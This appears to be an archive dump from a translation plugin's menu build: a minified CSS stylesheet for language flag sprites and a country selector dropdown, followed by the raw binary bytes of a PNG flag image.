0!important}.weglot-flags.flag-2.ky>a:before,.weglot-flags.flag-2.ky>span:before{background-position:-1800px 0!important}.weglot-flags.flag-2.lo>a:before,.weglot-flags.flag-2.lo>span:before{background-position:-1776px 0!important}.weglot-flags.flag-2.la>a:before,.weglot-flags.flag-2.la>span:before{background-position:-1968px 0!important}.weglot-flags.flag-2.lv>a:before,.weglot-flags.flag-2.lv>span:before{background-position:-1752px 0!important}.weglot-flags.flag-2.lt>a:before,.weglot-flags.flag-2.lt>span:before{background-position:-1656px 0!important}.weglot-flags.flag-2.lb>a:before,.weglot-flags.flag-2.lb>span:before{background-position:-1632px 0!important}.weglot-flags.flag-2.mk>a:before,.weglot-flags.flag-2.mk>span:before{background-position:-1440px 0!important}.weglot-flags.flag-2.mg>a:before,.weglot-flags.flag-2.mg>span:before{background-position:-1560px 0!important}.weglot-flags.flag-2.ms>a:before,.weglot-flags.flag-2.ms>span:before{background-position:-1536px 0!important}.weglot-flags.flag-2.ml>a:before,.weglot-flags.flag-2.ml>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.mt>a:before,.weglot-flags.flag-2.mt>span:before{background-position:-1200px 0!important}.weglot-flags.flag-2.mi>a:before,.weglot-flags.flag-2.mi>span:before{background-position:-1224px 0!important}.weglot-flags.flag-2.mr>a:before,.weglot-flags.flag-2.mr>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.mn>a:before,.weglot-flags.flag-2.mn>span:before{background-position:-4800px 0!important}.weglot-flags.flag-2.ne>a:before,.weglot-flags.flag-2.ne>span:before{background-position:-1320px 0!important}.weglot-flags.flag-2.no>a:before,.weglot-flags.flag-2.no>span:before{background-position:-4776px 0!important}.weglot-flags.flag-2.ps>a:before,.weglot-flags.flag-2.ps>span:before{background-position:-4008px 0!important}.weglot-flags.flag-2.fa>a:before,.weglot-flags.flag-2.fa>span:before{background-position:-5088px 0!important}.weglot-flags.flag-2.pl>a:before,.weglot-flags.flag-2.pl>span:before{background-position:-984px 0!important}.weglot-flags.flag-2.pt>a:before,.weglot-flags.flag-2.pt>span:before{background-position:-528px 0!important}.weglot-flags.flag-2.pa>a:before,.weglot-flags.flag-2.pa>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.ro>a:before,.weglot-flags.flag-2.ro>span:before{background-position:-960px 0!important}.weglot-flags.flag-2.ru>a:before,.weglot-flags.flag-2.ru>span:before{background-position:-936px 0!important}.weglot-flags.flag-2.sm>a:before,.weglot-flags.flag-2.sm>span:before{background-position:-3408px 0!important}.weglot-flags.flag-2.gd>a:before,.weglot-flags.flag-2.gd>span:before{background-position:-4872px 0!important}.weglot-flags.flag-2.sr>a:before,.weglot-flags.flag-2.sr>span:before{background-position:-3120px 0!important}.weglot-flags.flag-2.sn>a:before,.weglot-flags.flag-2.sn>span:before{background-position:-72px 0!important}.weglot-flags.flag-2.sd>a:before,.weglot-flags.flag-2.sd>span:before{background-position:-1128px 0!important}.weglot-flags.flag-2.si>a:before,.weglot-flags.flag-2.si>span:before{background-position:-480px 0!important}.weglot-flags.flag-2.sk>a:before,.weglot-flags.flag-2.sk>span:before{background-position:-4152px 0!important}.weglot-flags.flag-2.sl>a:before,.weglot-flags.flag-2.sl>span:before{background-position:-696px 0!important}.weglot-flags.flag-2.so>a:before,.weglot-flags.flag-2.so>span:before{background-position:-3336px 0!important}.weglot-flags.flag-2.st>a:before,.weglot-flags.flag-2.st>span:before{background-position:-3552px 0!important}.weglot-flags.flag-2.es>a:before,.weglot-flags.flag-2.es>span:before{background-position:-96px 0!important}.weglot-flags.flag-2.su>a:before,.weglot-flags.flag-2.su>span:before{background-position:-3312px 0!important}.weglot-flags.flag-2.sw>a:before,.weglot-flags.flag-2.sw>span:before{background-position:-1872px 0!important}.weglot-flags.flag-2.sv>a:before,.weglot-flags.flag-2.sv>span:before{background-position:-552px 0!important}.weglot-flags.flag-2.tl>a:before,.weglot-flags.flag-2.tl>span:before{background-position:-1008px 0!important}.weglot-flags.flag-2.ty>a:before,.weglot-flags.flag-2.ty>span:before{background-position:-4512px 0!important}.weglot-flags.flag-2.tg>a:before,.weglot-flags.flag-2.tg>span:before{background-position:-264px 0!important}.weglot-flags.flag-2.ta>a:before,.weglot-flags.flag-2.ta>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.tt>a:before,.weglot-flags.flag-2.tt>span:before{background-position:-936px 0!important}.weglot-flags.flag-2.te>a:before,.weglot-flags.flag-2.te>span:before{background-position:-1728px 0!important}.weglot-flags.flag-2.th>a:before,.weglot-flags.flag-2.th>span:before{background-position:-456px 0!important}.weglot-flags.flag-2.to>a:before,.weglot-flags.flag-2.to>span:before{background-position:-3264px 0!important}.weglot-flags.flag-2.tr>a:before,.weglot-flags.flag-2.tr>span:before{background-position:-360px 0!important}.weglot-flags.flag-2.uk>a:before,.weglot-flags.flag-2.uk>span:before{background-position:-288px 0!important}.weglot-flags.flag-2.ur>a:before,.weglot-flags.flag-2.ur>span:before{background-position:-1128px 0!important}.weglot-flags.flag-2.uz>a:before,.weglot-flags.flag-2.uz>span:before{background-position:-240px 0!important}.weglot-flags.flag-2.vi>a:before,.weglot-flags.flag-2.vi>span:before{background-position:-144px 0!important}.weglot-flags.flag-2.cy>a:before,.weglot-flags.flag-2.cy>span:before{background-position:-4848px 0!important}.weglot-flags.flag-2.fy>a:before,.weglot-flags.flag-2.fy>span:before{background-position:-1296px 0!important}.weglot-flags.flag-2.xh>a:before,.weglot-flags.flag-2.xh>span:before{background-position:-4968px 0!important}.weglot-flags.flag-2.yi>a:before,.weglot-flags.flag-2.yi>span:before{background-position:-1992px 0!important}.weglot-flags.flag-2.yo>a:before,.weglot-flags.flag-2.yo>span:before{background-position:-1103px 0!important}.weglot-flags.flag-2.zu>a:before,.weglot-flags.flag-2.zu>span:before{background-position:-4968px 0!important}.weglot-flags.flag-3.hw>a:before,.weglot-flags.flag-3.hw>span:before{background-position:-2711px 0!important}.weglot-flags.flag-3.fl>a:before,.weglot-flags.flag-3.fl>span:before{background-position:-5232px 0!important}.weglot-flags.flag-3.af>a:before,.weglot-flags.flag-3.af>span:before{background-position:-5496px 0!important}.weglot-flags.flag-3.sq>a:before,.weglot-flags.flag-3.sq>span:before{background-position:-4776px 0!important}.weglot-flags.flag-3.am>a:before,.weglot-flags.flag-3.am>span:before{background-position:-192px 0!important}.weglot-flags.flag-3.ar>a:before,.weglot-flags.flag-3.ar>span:before{background-position:-3336px 0!important}.weglot-flags.flag-3.hy>a:before,.weglot-flags.flag-3.hy>span:before{background-position:-4632px 0!important}.weglot-flags.flag-3.az>a:before,.weglot-flags.flag-3.az>span:before{background-position:-4536px 0!important}.weglot-flags.flag-3.ba>a:before,.weglot-flags.flag-3.ba>span:before{background-position:-2664px 0!important}.weglot-flags.flag-3.eu>a:before,.weglot-flags.flag-3.eu>span:before{background-position:-5808px 0!important}.weglot-flags.flag-3.be>a:before,.weglot-flags.flag-3.be>span:before{background-position:-144px 0!important}.weglot-flags.flag-3.bn>a:before,.weglot-flags.flag-3.bn>span:before{background-position:-4488px 0!important}.weglot-flags.flag-3.bs>a:before,.weglot-flags.flag-3.bs>span:before{background-position:-4392px 0!important}.weglot-flags.flag-3.bg>a:before,.weglot-flags.flag-3.bg>span:before{background-position:-4296px 0!important}.weglot-flags.flag-3.br>a:before,.weglot-flags.flag-3.br>span:before{background-position:-4344px 0!important}.weglot-flags.flag-3.my>a:before,.weglot-flags.flag-3.my>span:before{background-position:-3769px 0!important}.weglot-flags.flag-3.ca>a:before,.weglot-flags.flag-3.ca>span:before{background-position:-5784px 0!important}.weglot-flags.flag-3.zh>a:before,.weglot-flags.flag-3.zh>span:before{background-position:-3240px 0!important}.weglot-flags.flag-3.tw>a:before,.weglot-flags.flag-3.tw>span:before{background-position:-4008px 0!important}.weglot-flags.flag-3.km>a:before,.weglot-flags.flag-3.km>span:before{background-position:-4201px 0!important}.weglot-flags.flag-3.ny>a:before,.weglot-flags.flag-3.ny>span:before{background-position:-384px 0!important}.weglot-flags.flag-3.co>a:before,.weglot-flags.flag-3.co>span:before{background-position:-2760px 0!important}.weglot-flags.flag-3.hr>a:before,.weglot-flags.flag-3.hr>span:before{background-position:-3048px 0!important}.weglot-flags.flag-3.cs>a:before,.weglot-flags.flag-3.cs>span:before{background-position:-5280px 0!important}.weglot-flags.flag-3.da>a:before,.weglot-flags.flag-3.da>span:before{background-position:-3024px 0!important}.weglot-flags.flag-3.nl>a:before,.weglot-flags.flag-3.nl>span:before{background-position:-3360px 0!important}.weglot-flags.flag-3.en>a:before,.weglot-flags.flag-3.en>span:before,.weglot-flags.flag-3.eo>a:before,.weglot-flags.flag-3.eo>span:before{background-position:-2520px 0!important}.weglot-flags.flag-3.et>a:before,.weglot-flags.flag-3.et>span:before{background-position:-2856px 0!important}.weglot-flags.flag-3.fj>a:before,.weglot-flags.flag-3.fj>span:before{background-position:0 0!important}.weglot-flags.flag-3.fi>a:before,.weglot-flags.flag-3.fi>span:before{background-position:-2784px 0!important}.weglot-flags.flag-3.fr>a:before,.weglot-flags.flag-3.fr>span:before{background-position:-2760px 0!important}.weglot-flags.flag-3.gl>a:before,.weglot-flags.flag-3.gl>span:before{background-position:-5832px 0!important}.weglot-flags.flag-3.ka>a:before,.weglot-flags.flag-3.ka>span:before{background-position:-1536px 0!important}.weglot-flags.flag-3.de>a:before,.weglot-flags.flag-3.de>span:before{background-position:-1488px 0!important}.weglot-flags.flag-3.el>a:before,.weglot-flags.flag-3.el>span:before{background-position:-1416px 0!important}.weglot-flags.flag-3.gu>a:before,.weglot-flags.flag-3.gu>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.ht>a:before,.weglot-flags.flag-3.ht>span:before{background-position:-5160px 0!important}.weglot-flags.flag-3.ha>a:before,.weglot-flags.flag-3.ha>span:before{background-position:-361px 0!important}.weglot-flags.flag-3.he>a:before,.weglot-flags.flag-3.he>span:before{background-position:-1608px 0!important}.weglot-flags.flag-3.hi>a:before,.weglot-flags.flag-3.hi>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.hu>a:before,.weglot-flags.flag-3.hu>span:before{background-position:-1920px 0!important}.weglot-flags.flag-3.is>a:before,.weglot-flags.flag-3.is>span:before{background-position:-840px 0!important}.weglot-flags.flag-3.ig>a:before,.weglot-flags.flag-3.ig>span:before{background-position:-3457px 0!important}.weglot-flags.flag-3.id>a:before,.weglot-flags.flag-3.id>span:before{background-position:-4992px 0!important}.weglot-flags.flag-3.ga>a:before,.weglot-flags.flag-3.ga>span:before{background-position:-2016px 0!important}.weglot-flags.flag-3.it>a:before,.weglot-flags.flag-3.it>span:before{background-position:-336px 0!important}.weglot-flags.flag-3.ja>a:before,.weglot-flags.flag-3.ja>span:before{background-position:-2448px 0!important}.weglot-flags.flag-3.jv>a:before,.weglot-flags.flag-3.jv>span:before{background-position:-864px 0!important}.weglot-flags.flag-3.kn>a:before,.weglot-flags.flag-3.kn>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.kk>a:before,.weglot-flags.flag-3.kk>span:before{background-position:-3912px 0!important}.weglot-flags.flag-3.ko>a:before,.weglot-flags.flag-3.ko>span:before{background-position:-2256px 0!important}.weglot-flags.flag-3.ku>a:before,.weglot-flags.flag-3.ku>span:before{background-position:-1920px 0!important}.weglot-flags.flag-3.ky>a:before,.weglot-flags.flag-3.ky>span:before{background-position:-744px 0!important}.weglot-flags.flag-3.lo>a:before,.weglot-flags.flag-3.lo>span:before{background-position:-3816px 0!important}.weglot-flags.flag-3.la>a:before,.weglot-flags.flag-3.la>span:before{background-position:-336px 0!important}.weglot-flags.flag-3.lv>a:before,.weglot-flags.flag-3.lv>span:before{background-position:-216px 0!important}.weglot-flags.flag-3.lt>a:before,.weglot-flags.flag-3.lt>span:before{background-position:-1776px 0!important}.weglot-flags.flag-3.lb>a:before,.weglot-flags.flag-3.lb>span:before{background-position:-1945px 0!important}.weglot-flags.flag-3.mk>a:before,.weglot-flags.flag-3.mk>span:before{background-position:-2208px 0!important}.weglot-flags.flag-3.mg>a:before,.weglot-flags.flag-3.mg>span:before{background-position:-5064px 0!important}.weglot-flags.flag-3.ms>a:before,.weglot-flags.flag-3.ms>span:before{background-position:-864px 0!important}.weglot-flags.flag-3.ml>a:before,.weglot-flags.flag-3.ml>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.mt>a:before,.weglot-flags.flag-3.mt>span:before{background-position:-4920px 0!important}.weglot-flags.flag-3.mi>a:before,.weglot-flags.flag-3.mi>span:before{background-position:-2113px 0!important}.weglot-flags.flag-3.mr>a:before,.weglot-flags.flag-3.mr>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.mn>a:before,.weglot-flags.flag-3.mn>span:before{background-position:-24px 0!important}.weglot-flags.flag-3.ne>a:before,.weglot-flags.flag-3.ne>span:before{background-position:-5642px 0!important}.weglot-flags.flag-3.no>a:before,.weglot-flags.flag-3.no>span:before{background-position:-984px 0!important}.weglot-flags.flag-3.ps>a:before,.weglot-flags.flag-3.ps>span:before{background-position:-4753px 0!important}.weglot-flags.flag-3.fa>a:before,.weglot-flags.flag-3.fa>span:before{background-position:-816px 0!important}.weglot-flags.flag-3.pl>a:before,.weglot-flags.flag-3.pl>span:before{background-position:-4944px 0!important}.weglot-flags.flag-3.pt>a:before,.weglot-flags.flag-3.pt>span:before{background-position:-3504px 0!important}.weglot-flags.flag-3.pa>a:before,.weglot-flags.flag-3.pa>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.ro>a:before,.weglot-flags.flag-3.ro>span:before{background-position:-3744px 0!important}.weglot-flags.flag-3.ru>a:before,.weglot-flags.flag-3.ru>span:before{background-position:-2664px 0!important}.weglot-flags.flag-3.sm>a:before,.weglot-flags.flag-3.sm>span:before{background-position:-1248px 0!important}.weglot-flags.flag-3.gd>a:before,.weglot-flags.flag-3.gd>span:before{background-position:-3841px 0!important}.weglot-flags.flag-3.sr>a:before,.weglot-flags.flag-3.sr>span:before{background-position:-3312px 0!important}.weglot-flags.flag-3.sn>a:before,.weglot-flags.flag-3.sn>span:before{background-position:-5521px 0!important}.weglot-flags.flag-3.sd>a:before,.weglot-flags.flag-3.sd>span:before{background-position:-1993px 0!important}.weglot-flags.flag-3.si>a:before,.weglot-flags.flag-3.si>span:before{background-position:-2833px 0!important}.weglot-flags.flag-3.sk>a:before,.weglot-flags.flag-3.sk>span:before{background-position:-552px 0!important}.weglot-flags.flag-3.sl>a:before,.weglot-flags.flag-3.sl>span:before{background-position:-936px 0!important}.weglot-flags.flag-3.so>a:before,.weglot-flags.flag-3.so>span:before{background-position:-4032px 0!important}.weglot-flags.flag-3.st>a:before,.weglot-flags.flag-3.st>span:before{background-position:-3961px 0!important}.weglot-flags.flag-3.es>a:before,.weglot-flags.flag-3.es>span:before{background-position:-3576px 0!important}.weglot-flags.flag-3.su>a:before,.weglot-flags.flag-3.su>span:before{background-position:-3985px 0!important}.weglot-flags.flag-3.sw>a:before,.weglot-flags.flag-3.sw>span:before{background-position:-912px 0!important}.weglot-flags.flag-3.sv>a:before,.weglot-flags.flag-3.sv>span:before{background-position:-264px 0!important}.weglot-flags.flag-3.tl>a:before,.weglot-flags.flag-3.tl>span:before{background-position:-5232px 0!important}.weglot-flags.flag-3.ty>a:before,.weglot-flags.flag-3.ty>span:before{background-position:-1512px 0!important}.weglot-flags.flag-3.tg>a:before,.weglot-flags.flag-3.tg>span:before{background-position:-3720px 0!important}.weglot-flags.flag-3.ta>a:before,.weglot-flags.flag-3.ta>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.tt>a:before,.weglot-flags.flag-3.tt>span:before{background-position:-2664px 0!important}.weglot-flags.flag-3.te>a:before,.weglot-flags.flag-3.te>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.th>a:before,.weglot-flags.flag-3.th>span:before{background-position:-4848px 0!important}.weglot-flags.flag-3.to>a:before,.weglot-flags.flag-3.to>span:before{background-position:-1680px 0!important}.weglot-flags.flag-3.tr>a:before,.weglot-flags.flag-3.tr>span:before{background-position:-432px 0!important}.weglot-flags.flag-3.uk>a:before,.weglot-flags.flag-3.uk>span:before{background-position:-5736px 0!important}.weglot-flags.flag-3.ur>a:before,.weglot-flags.flag-3.ur>span:before{background-position:-1992px 0!important}.weglot-flags.flag-3.uz>a:before,.weglot-flags.flag-3.uz>span:before{background-position:-2160px 0!important}.weglot-flags.flag-3.vi>a:before,.weglot-flags.flag-3.vi>span:before{background-position:-3384px 0!important}.weglot-flags.flag-3.cy>a:before,.weglot-flags.flag-3.cy>span:before{background-position:-5040px 0!important}.weglot-flags.flag-3.fy>a:before,.weglot-flags.flag-3.fy>span:before{background-position:-3360px 0!important}.weglot-flags.flag-3.xh>a:before,.weglot-flags.flag-3.xh>span:before{background-position:-5496px 0!important}.weglot-flags.flag-3.yi>a:before,.weglot-flags.flag-3.yi>span:before{background-position:-1608px 0!important}.weglot-flags.flag-3.yo>a:before,.weglot-flags.flag-3.yo>span:before{background-position:-3457px 0!important}.weglot-flags.flag-3.zu>a:before,.weglot-flags.flag-3.zu>span:before{background-position:-5496px 0!important}body div[id^=mega-menu-wrap] #mega-menu-primary li.mega-menu-item.weglot-flags a.mega-menu-link:before{background-image:url(images/rect_mate.b41fa0fe.png)!important;background-size:auto 20px!important;border-radius:0!important;content:"";display:inline-block;height:20px!important;margin-right:10px;overflow:hidden;vertical-align:middle;width:30px!important}body div[id^=mega-menu-wrap] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-1 .mega-menu-link:before{background-image:url(images/rect_bright.93dd8032.png)!important}body div[id^=mega-menu-wrap] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-2 .mega-menu-link:before{background-image:url(images/square_flag.32ea47ac.png)!important;background-size:auto 24px!important;height:24px!important;width:24px!important}body div[id^=mega-menu-wrap] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-3 .mega-menu-link:before{background-image:url(images/circular_flag.2a0fa173.png)!important;background-size:auto 24px!important;height:24px!important;width:24px!important}#wp-admin-bar-weglot>.ab-item{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMDAiIGhlaWdodD0iMzAwIj48ZyBmaWxsPSIjYTBhNWFhIj48cGF0aCBkPSJtMjEuNzM5IDkyLjU2NSA1MS44MjggMTI5LjczMiAyMy42Ni02MC4yNzkgMjQuMTQ0IDYwLjI3OUwxNzMuMiA5Mi41NjVoLTI4LjAwN2wtMjMuODIyIDU4Ljc1LTIzLjkwMi01OC43NS0yMy45MDIgNTguNzUtMjMuOTAyLTU4Ljc1SDIxLjczOXoiLz48cGF0aCBkPSJNMjEwLjAwNiA5Mi43MWMtMTcuODY2IDAtMzMuMTU3IDYuMzU4LTQ1Ljg3MyAxOS4wNzQtMTIuNzE1IDEyLjcxNi0xOC45OTMgMjguMDA2LTE4Ljk5MyA0NS43OTIgMCAxNy44NjcgNi4yNzggMzMuMTU4IDE4Ljk5MyA0NS44NzMgMTIuNzE2IDEyLjcxNiAyOC4wMDcgMTguOTkzIDQ1Ljg3MyAxOC45OTMgMTcuNzg2IDAgMzMuMDc3LTYuMjc3IDQ1Ljc5My0xOC45OTMgMTIuNzE1LTEyLjcxNSAxOS4wNzMtMjguMDA2IDE5LjA3My00NS44NzMgMC00LjUwNy0uNDgzLTguODUyLTEuMjg4LTEyLjk1N2gtNjMuNTc4djI1LjkxNGgzNi42OTljLTIuNzM3IDcuNTY1LTcuNDg1IDEzLjg0My0xNC4wODQgMTguNjcxLTYuNjggNC44My0xNC4yNDUgNy4yNDQtMjIuNjE1IDcuMjQ0LTEwLjc4NCAwLTE5Ljk1OC0zLjc4My0yNy41MjMtMTEuMzQ4LTcuNTY2LTcuNTY1LTExLjM0OC0xNi43NC0xMS4zNDgtMjcuNTI0IDAtMTAuNjIzIDMuNzgyLTE5Ljc5OCAxMS4zNDgtMjcuNDQzIDcuNTY1LTcuNjQ1IDE2Ljc0LTExLjUwOCAyNy41MjMtMTEuNTA4IDEwLjYyMyAwIDE5Ljc5OCAzLjg2MyAyNy41MjQgMTEuNDI4bDE4LjM1LTE4LjM1YTY3Ljk2MyA2Ny45NjMgMCAwIDAtMjAuNzY0LTEzLjg0MmMtNy44ODctMy4zOC0xNi4yNTctNS4xNS0yNS4xMS01LjE1eiIvPjwvZz48L3N2Zz4=)!important;background-position:4px 5px!important;background-repeat:no-repeat!important;background-size:22px auto!important;padding-left:30px!important}.weglot-hide,li.weglot-hide{display:none!important}.country-selector{display:inline-block;position:relative;text-align:left;width:auto;z-index:9999}.country-selector a{-webkit-touch-callout:none;color:#000;cursor:pointer;float:none!important;font-weight:400;outline:none;padding:0 10px;text-decoration:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;white-space:nowrap}.country-selector a:focus{outline:none}.country-selector ul{list-style:none;margin:0;padding:0;z-index:1010}.country-selector li{margin:0;padding:0}.country-selector.weglot-dropdown{background-color:#fff}.country-selector.weglot-dropdown a,.country-selector.weglot-dropdown span{box-sizing:border-box;display:block;font-size:13px;font-weight:400;height:37px;line-height:36px;padding:0 10px;width:100%}.country-selector.weglot-dropdown a:hover,.country-selector.weglot-dropdown span:hover{cursor:pointer}.country-selector.weglot-dropdown .wgcurrent{border:1px solid #e0e0e0;display:block;list-style:none;margin:0}.country-selector.weglot-dropdown .wgcurrent a,.country-selector.weglot-dropdown .wgcurrent span{padding-right:60px}.country-selector.weglot-dropdown .wgcurrent:after{-ms-interpolation-mode:nearest-neighbor;background:url(images/wgarrowdown.517eb92e.png) no-repeat;content:"";display:inline-block;height:7px;image-rendering:-moz-crisp-edges;image-rendering:-webkit-optimize-contrast;image-rendering:-o-pixelated;image-rendering:pixelated;position:absolute;right:8px;top:17px;transform:rotate(-90deg);transition:all .2s;width:13px}.country-selector.weglot-dropdown ul{background:#fff;border:1px solid #ebeef0;box-sizing:border-box;display:none;left:0;min-width:100%;padding:0;position:absolute;top:auto}.country-selector.weglot-dropdown input:checked~ul{display:block}.country-selector.weglot-dropdown input:checked~.wgcurrent:after{transform:rotate(0deg)}.country-selector.weglot-dropdown li{width:100%}.country-selector.weglot-dropdown.weglot-invert ul{bottom:38px}.country-selector.weglot-dropdown.weglot-invert input:checked~.wgcurrent:after{transform:rotate(-180deg)}.country-selector.weglot-default{bottom:0;position:fixed;right:40px}.country-selector.weglot-inline a:hover{color:#00a0d2;text-decoration:underline}.country-selector.weglot-inline .wgcurrent a{text-decoration:underline}.country-selector.weglot-inline label{margin-bottom:0}.country-selector.weglot-inline label,.country-selector.weglot-inline li,.country-selector.weglot-inline ul{display:inline-block;vertical-align:middle}.country-selector.weglot-inline li{line-height:1!important;margin:2px 0}.country-selector.weglot-inline.weglot-default{bottom:5px}.country-selector input{display:none!important}.navbar .navbar-nav li.weglot-flags a.weglot-lang:before{position:static;transform:none;transition:none}.js .main-navigation .country-selector ul{display:none}html[dir=rtl] .weglot-flags a:before,html[dir=rtl] .weglot-flags span:before{margin-left:10px;margin-right:0}.weglot-flags>a:before,.weglot-flags>span.wglanguage-name:before{background-image:url(images/rect_mate.b41fa0fe.png);background-size:auto 20px!important;border-radius:0!important;content:"";display:inline-block;height:20px!important;margin-right:10px;overflow:hidden;vertical-align:middle;width:30px!important}.weglot-flags.flag-1>a:before,.weglot-flags.flag-1>span:before{background-image:url(images/rect_bright.93dd8032.png)}.weglot-flags.flag-2>a:before,.weglot-flags.flag-2>span:before{background-image:url(images/square_flag.32ea47ac.png);background-size:auto 24px!important;height:24px!important;width:24px!important}.weglot-flags.flag-3 a:before,.weglot-flags.flag-3 span:before{background-image:url(images/circular_flag.2a0fa173.png);background-size:auto 24px!important;height:24px!important;width:24px!important}.weglot-flags>a span:before,.weglot-flags>span a:before{background-image:none!important;display:none!important}
weglot-menu/build/images/rect_bright.93dd8032.png000064400000103470151330373270015445 0ustar00�PNG


IHDR ��aG��PLTE������(7$}�4����&4��/�+�&�Bz=jNu����+���)3�jA7��-�# �).��)9��y]�I���Q3{������Cf�:�
I�������@��s��J�V��*k��=()�)e�`#J�=��v����� b2gƣ08�}(x� �r��c�����H�L��<��<!B�����Y����K����/�(R���$7��&(�+-~�?4?�!]6�P���s��9|��!&�o=)�>�	/"B��	:u�r) �CQ��	����Z8\�����S��(f�l���,��䅌
+�<v)�����[�s�8Fӱ9������j��NWM���$(?Z��9�jj��0�*W��퐕C~��2H�5�
ڻ7����j���|������� 
��B1�pi?��HR7�3�����0�!N��pQ3͡�����(�(Nm��Ҥ}�,W�wzö���Ӫ�0�ٽ�l͢K��б����r��%9.ird�Xb��@}�t�������
t��X���M�/I�_�˼��X8Vo��O?
�XY��Á�ock|��tg��f���ː�\.��UC&�������]���ɸ���l�*��<���Ys6�|Q,n��^��/T�d!6Zqd��O��IDATx���k@T�7�e�
*�Fc	�V[ʹ5��J�>�ٱa�� �jS�D51q3��۠6�L:8��0����&��N�y7��|99�B�(x~���{��0��:�0����ÜT�a�:�o�/�X��ᇣ�~�[�6�"�[�z�_�E��5cƬY3f<�/��-[q�a�#S��īފ��,o)}Y�;0W�|XA�+LP�lDy�L���"���Al�-��?R��]�"���˕�dt�_��E3��-�sq�.�A�����p�de��*����.�+�u������*D\��_���U:A�z������8RYy$vY�a��~q�����^�~������T���)[�o�i��M���_e� ��_r��_��?���w@�UX�@�ٻ���G���;�*z�����G�����.����}@��� ~$[1C�b�lD�!^����LAѯ�t�Fo�^�'�E�A�<��"�M����o������BBҽ�=����-s�_d� �THHh(��X�)�;�?�^"S�H��׿�eK�bћL^�L�"��IA�L������t)��zv��gq��߿%(��[����}5�vyK���������p���+�~Ce��SO�A���ƕ��~'����ː-�����=�jU����*�����n������ 6˖�Ki���ni��#�R���ʖ��[��	w�5G���/�[�"8\*�+������۷[}��z�}+�At(�?�+_L���N���r���+}�
�EᲥ���m��a� ~.[�O�������<"[��%T��:����SOo�-j�ĥ�||_P_� f�A��-��7Z�sH��_�������?��?��8�죰���+��gdKy�V��^�|��f�z�"���-����R~����U��~��eKy�*B�`��S�R>���a��v��xkDz�"�z��)[��_Ta[���u�5Re��W��eK����lD�lq�g|��9��xG}�a�����E���
�p�O�R�^��1�b�l)�o����h�Y���[���|_��\���-Z�������<�к�n�.,�߼U������J��l�KG�:􄖤�&�V�� �`o_HQ���oق߯�7�,]���%��v?}��_�CɎ�,[�7�[5��k���wom�5޽��do���[�_�Փ�-���l1�����-���\t��S�"��W���ˋD�%_��s���D�+��&����R޿6)쟾)[�,[�
Sho�Qq�]$v`��߂y�2W�$���B����6+��o����W�z�_�F����=�ϯt��R���3S���n��3��/����CJ�O�.[���� �z�����K�c�M[�"�eKy�������_B�?��D���>��'U�NA��jE�dM��7>�p��|��+��-�(����Ɵd
����H�Nߣ��ϡ9�U���O��U�WT쬠�ׂ��g/wR7��Jm��N[��%��_���T����I/y{��
dt��_�.X�!4�KU�� �*�
��n�>G���놈�̈�5�%.��n�~�����t���#�[J��)�������G��
h�e��f2����|��[�n�-�	�8����Z[�g��t���\����zu�
�ᓾ���O�n���c���O����ߝ�
O�uE�Ӝ�-�w]I7쟎n8���n�lC�le�@��wT7���D��(���a��E�nx�����d�Ý�
J�%���A�
���t���
�!�h8�y@����w@7��;J����M7d�tC�-[l�������fVh���A�P3������\^7t�]	�nX���fvtzz�tCh�#�����$����x�=�f�����cH�
:�P�a�����<�n��{�7�^rt�ǝ�N7����t}���{(A?Z\��Nksg���������*,F��RaMK���������V7��|�t����n��{�u��:I��]���;�-�?_y�u��T���
�׏K����n����i[�tó��Ϟ;w�;}�绣�_�t:��W�
?L7�.��n
�t��Bw6��/P�0&��x?���a7U_h�W���+[��ѳ���h/�Z�vj|jr�S�!H��j|sP�0�]~�t��P�C�n�YY930�0�pں� ��=��'x�s��au��ۙ�w'lG��.�c	W7\��u�!�%���s��wX�`>R�n��s�nx䚃pI����h|E0AF���¦����T�	q�����S�����7�놲C?���p��]TꆆN�@A�n�-���,W��F��G0߿����w_7X���d�nX��p�S!uC�#ݠ�iu��
�b(�p��y�n
-_8-�`���2�ˀ�P�H�q3w�$z�R7������O��
G�t�Rt�~�7h���Fx=�� �>�p���}&���E'�V�W��Zd���y�nx�������i��6d�ݰ����
a�Ci	����0y��=߾@�f��<�:���n:-������u�u×�!q�.���X�n��4�au�g7�'�
F(�P(�
��z����R�sgEKK��᷾ڱ�u���n����hZ7p}���n82�4Q��E��
��e�l����������+�.��s���@78�|W�~˸�0&��Uʯ߼y&��0���
��nH^��Rdtë�R�
�2��T�>�2�ʢ>	�n8y������n�F�
��9����ߝ�n`\��֋��
���0�醓��2u���"N�<)߀(�SO�m�l5��b�n폗�
��nX��ի�.ʳ�?{�%� ��
����ϗ�
����
�J�%�����n���J7�rZ�Ζ�,c`�!��'�IX�@��R3�0,ugt�$Y7��5i	)���n�{a?}OE7lg/����7٢��~H]x�!��
�g���7�Q�!Oy��qn��7�HO��n���������+H�
I56�!}�Lv���u[K�!4t��n`^��^�}���a�~��YX�t�/n/��n���Kϻ�_7dg�t�$dX���i�� ��~�r$�ѵ0�a]���uݝ�n =n��nHR�n�F��@UoM:��3�x�
���t�sn���_{u��b�X����,��e�z3X���F7����p��nH�,����uìY�wX7�AQ/g���dݰe���ɚ;�����a��2��/*�K����k�__I7�Vu�����x��s�SWs��:)��绖��KE���n�]�F7dfJ�PQ|CJt�t�~E]f��n�-�֮]hv���yN8����7p~�vqtC ���gϒ;��/�������!����G��m.np�j�e�p�!F��yC���F�cc����n��
ʺ!_��;npC>�
�R�솧9�
�2j2�}��s;������U�!���FFZ�nX�o`�lGw��
mեg��ڪ��U��>�Pt��������{���05p�i�I��Ϸ6H�!��Gj)���'��g7l�ג͛����
